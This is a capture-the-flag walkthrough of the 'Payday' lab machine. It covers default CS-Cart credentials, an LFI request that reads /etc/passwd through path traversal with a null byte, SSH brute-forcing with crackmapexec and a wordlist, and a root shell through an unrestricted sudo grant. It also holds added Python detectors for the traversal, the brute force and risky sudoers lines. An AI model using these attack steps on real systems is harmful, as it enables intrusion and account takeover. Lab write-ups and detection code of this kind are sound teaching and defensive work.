# Payday

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0f1f2ae92fa735ea7edb86fe452eac4ad22c6278%2Fimage.png?alt=media)

## Nmap

```
sudo nmap 192.168.189.39 -p- -sS

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s
```

## HTTP

The default root page on port 80 takes us to a CS-Cart store page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cbead386b4bd0f1223fa69ae1d6d1eb73c27c781%2Fimage.png?alt=media)

The page shows that this is a running demo installation, so common default login credentials are worth trying.

I tried admin:admin and was able to log in to the web application. After logging in I could not see that much had changed and was unable to find anything interesting. A quick Google search produces a potential authenticated RCE exploit.

{% embed url="https://www.exploit-db.com/exploits/48891" %}

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-01db05ea80c3e7d73081eb5e427000f94856aa37%2Fimage.png?alt=media)

I could not find anywhere to upload files through the file manager, and after a short while decided not to pursue this exploit for the time being.

## LFI

Further searching also turns up a potential LFI exploit for CS-Cart.

{% embed url="https://www.exploit-db.com/exploits/48890" %}

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f022d63d6463acdff94df571e1b0eac7af65220a%2Fimage.png?alt=media)

Let's test one of these and see if we can read /etc/passwd.

```
http://192.168.189.39/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ee35a48346622db210436c8ea7051bb2d2cbd5fe%2Fimage.png?alt=media)

We have confirmed the LFI and have read the passwd file. We can take note of the user 'patrick', which is the last entry in the file.

I tried reading other common LFI paths and could not find further information. The user patrick did not appear to have any SSH keys in /home/patrick/.ssh/.
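From the defender's side, the request above leaves a distinctive trace in the web server's access log: a `../` run, a `%00` terminator and a well-known system file, all inside one query parameter. The following Python is an added example (not part of the original writeup or of CS-Cart) that scans combined-format access log lines for those three indicators, decoding percent-encoding repeatedly so that `..%2F` and double-encoded variants are caught. The log lines, IPs and timestamps are constructed for the example; the first request mirrors the one tested above.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format. The first two mirror
# the traversal request used above (one plain, one percent-encoded); the rest
# are benign store traffic. IPs and timestamps are made up.
SAMPLE_ACCESS_LOG = """\
192.168.49.189 - - [10/Mar/2021:14:02:11 +0000] "GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.49.189 - - [10/Mar/2021:14:02:15 +0000] "GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2021:14:03:01 +0000] "GET /index.php?dispatch=products.view&product_id=12 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
10.0.0.8 - - [10/Mar/2021:14:03:09 +0000] "GET /images/logo.png HTTP/1.1" 304 0 "-" "Mozilla/5.0"
"""

LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
# Files a traversal probe usually goes for first; extend this for your stack.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/proc/self/environ")


def fully_decode(value, rounds=3):
    """Percent-decode until the value stops changing (catches double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_target(target):
    """Return the sorted list of indicator names found in one request target."""
    parsed = urlsplit(target)
    # Inspect the path plus every query value; parse_qsl already decodes once.
    candidates = [parsed.path] + [
        v for _, v in parse_qsl(parsed.query, keep_blank_values=True)
    ]
    found = set()
    for raw in candidates:
        value = fully_decode(raw)
        if TRAVERSAL_RE.search(value):
            found.add("path_traversal")
        if "\x00" in value:
            found.add("null_byte")  # the %00 terminator the request above relies on
        if any(p in value for p in SENSITIVE_PATHS):
            found.add("sensitive_file")
    return sorted(found)


def scan_access_log(text):
    """Return one finding dict per suspicious request; benign lines are skipped."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        indicators = analyze_target(m.group("target"))
        if indicators:
            findings.append({
                "ip": m.group("ip"),
                "status": int(m.group("status")),  # a 200 means the read likely worked
                "target": m.group("target"),
                "indicators": indicators,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f["ip"], f["status"], ",".join(f["indicators"]), f["target"])
```

Run against the sample, both traversal requests are reported with all three indicators and the store traffic is ignored. The HTTP status is kept in each finding because a 200 on such a request is the signal that the file was actually served, which is what turns a probe into an incident.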

## SSH Bruteforce

With a known user on the system we can try bruteforcing pop3 / imap over telnet, and we can try `SSH`. I first set up `crackmapexec` to brute force SSH.

```
crackmapexec ssh 192.168.189.39 -u patrick -p /usr/share/wordlists/rockyou.txt
```

We soon find a valid set of credentials: `patrick:patrick`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c22065369d902bfd082641b46e16066e6894f9ea%2Fimage.png?alt=media)
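A wordlist run like the one above is noisy on the target: sshd writes one `Failed password` line per attempt to the auth log, and the eventual `Accepted password` from the same source is the line that matters most. The following Python is an added example (not part of the original writeup or of crackmapexec) that reads syslog-style sshd lines, finds sources with a burst of failures inside a sliding time window, and reports any account that source then logged into. The log excerpt, hostnames and IPs are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log excerpt (syslog format, which carries no year). One
# source hammers patrick's account and finally gets in; an unrelated host
# authenticates cleanly with a key.
SAMPLE_AUTH_LOG = """\
Mar 10 14:05:01 payday sshd[2201]: Failed password for patrick from 192.168.49.189 port 50122 ssh2
Mar 10 14:05:02 payday sshd[2203]: Failed password for patrick from 192.168.49.189 port 50124 ssh2
Mar 10 14:05:02 payday sshd[2205]: Failed password for patrick from 192.168.49.189 port 50126 ssh2
Mar 10 14:05:03 payday sshd[2207]: Failed password for invalid user admin from 192.168.49.189 port 50128 ssh2
Mar 10 14:05:04 payday sshd[2209]: Failed password for patrick from 192.168.49.189 port 50130 ssh2
Mar 10 14:05:05 payday sshd[2211]: Failed password for patrick from 192.168.49.189 port 50132 ssh2
Mar 10 14:05:06 payday sshd[2213]: Accepted password for patrick from 192.168.49.189 port 50134 ssh2
Mar 10 14:09:40 payday sshd[2300]: Accepted publickey for ops from 10.0.0.5 port 41022 ssh2
"""

EVENT_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?'
    r'(?P<user>\S+) from (?P<ip>\S+) port \d+'
)


def parse_ts(text, year=2021):
    """Syslog timestamps have no year; pin one so the timestamps compare."""
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def detect_ssh_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: summary} for sources with >= threshold failures inside
    one window, noting which accounts that source logged into afterwards."""
    failures = defaultdict(list)   # ip -> [timestamp]
    successes = defaultdict(list)  # ip -> [(timestamp, user)]
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        ts = parse_ts(m.group("ts"))
        if m.group("result") == "Failed":
            failures[m.group("ip")].append(ts)
        else:
            successes[m.group("ip")].append((ts, m.group("user")))

    alerts = {}
    for ip, times in failures.items():
        times.sort()
        # Sliding window: size of the densest burst of failures from this source.
        start, best = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best < threshold:
            continue
        last_fail = times[-1]
        logged_in = [u for t, u in successes.get(ip, []) if t >= last_fail]
        alerts[ip] = {
            "failures": len(times),
            "burst": best,
            "success_after_burst": logged_in,  # accounts to treat as compromised
        }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_ssh_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

On the sample the single noisy source is reported with six failures in a four-second burst and `patrick` as the account it then reached. On a real host the same pattern is what fail2ban keys on; lowering `MaxAuthTries` in `sshd_config` and moving the account to key-only authentication removes the guessable-password path entirely.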

## Low Privilege Access

We now attempt to login with `SSH`.

```
ssh patrick@192.168.189.39
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2d23baa7740b51cbd1a35839715579fbbc9e8413%2Fimage.png?alt=media)

## Privilege Escalation

Privilege escalation proved to be exceptionally easy on this machine. Before uploading any enumeration scripts I always perform a quick check of what we can run with sudo using `sudo -l`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dd0197b23367e026666cb9e41e990b7d1151f066%2Fimage.png?alt=media)

Here we can see that patrick can run sudo as any user on any command. This is a quick win, as we can run `sudo` as root on /bin/bash to spawn a root shell.
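The grant behind that `sudo -l` output is a single sudoers line of the form `patrick ALL=(ALL) ALL`, and the fix is to replace it with the specific commands the account actually needs. The following Python is an added example (not part of the original writeup) that parses sudoers user-specification lines and flags grants that amount to a root shell: any `ALL` command, a shell binary, and the `NOPASSWD:` tag on top of either. The sudoers excerpt is constructed; its first grant is the kind shown above and the `deploy` and `backup` lines show the scoped alternative.

```python
import re

# Constructed sudoers excerpt: patrick's line is the kind of grant the
# `sudo -l` output above reveals; deploy and backup show scoped grants.
SAMPLE_SUDOERS = """\
# User privilege specification
Defaults env_reset
root    ALL=(ALL:ALL) ALL
patrick ALL=(ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart webapp
backup  ALL=(root) /usr/bin/rsync, /bin/tar
%admin  ALL=(ALL) NOPASSWD: ALL
"""

SKIP_RE = re.compile(r'^(?:Defaults|Cmnd_Alias|User_Alias|Host_Alias|Runas_Alias)\b')
SPEC_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$'
)
TAG_RE = re.compile(
    r'\b(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT'
    r'|LOG_OUTPUT|NOLOG_OUTPUT):\s*'
)
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "/usr/bin/bash"}


def parse_spec(line):
    """Parse one user-specification line into a dict; None for other lines."""
    line = line.split("#", 1)[0].strip()
    if not line or SKIP_RE.match(line):
        return None
    m = SPEC_RE.match(line)
    if not m:
        return None
    cmds_text = m.group("cmds")
    cmds = [c.strip() for c in TAG_RE.sub("", cmds_text).split(",") if c.strip()]
    return {
        "who": m.group("who"),
        "runas": m.group("runas") or "root",  # sudo's default when no (user) is given
        "nopasswd": "NOPASSWD:" in cmds_text,
        "cmds": cmds,
    }


def audit_sudoers(text):
    """Return (who, runas, reasons) for every grant that hands out a root shell."""
    findings = []
    for line in text.splitlines():
        spec = parse_spec(line)
        if not spec or spec["who"] == "root":
            continue
        reasons = []
        if "ALL" in spec["cmds"]:
            reasons.append("any command")  # equivalent to the root shell shown above
        elif any(c.split()[0] in SHELLS for c in spec["cmds"]):
            reasons.append("shell binary")
        if reasons and spec["nopasswd"]:
            reasons.append("no password required")
        if reasons:
            findings.append((spec["who"], spec["runas"], reasons))
    return findings


if __name__ == "__main__":
    for who, runas, reasons in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{who} as ({runas}): {', '.join(reasons)}")
```

On the sample, `patrick` and the `%admin` group are flagged while the `deploy` and `backup` grants pass, because a fixed command list with no shell in it does not give the caller an arbitrary root process. Run the real thing over `/etc/sudoers` and `/etc/sudoers.d/*` after `visudo -c` confirms the files parse.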

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0bb7a20d1d01496ca9c440e0c652b015dd5b1d90%2Fimage.png?alt=media)
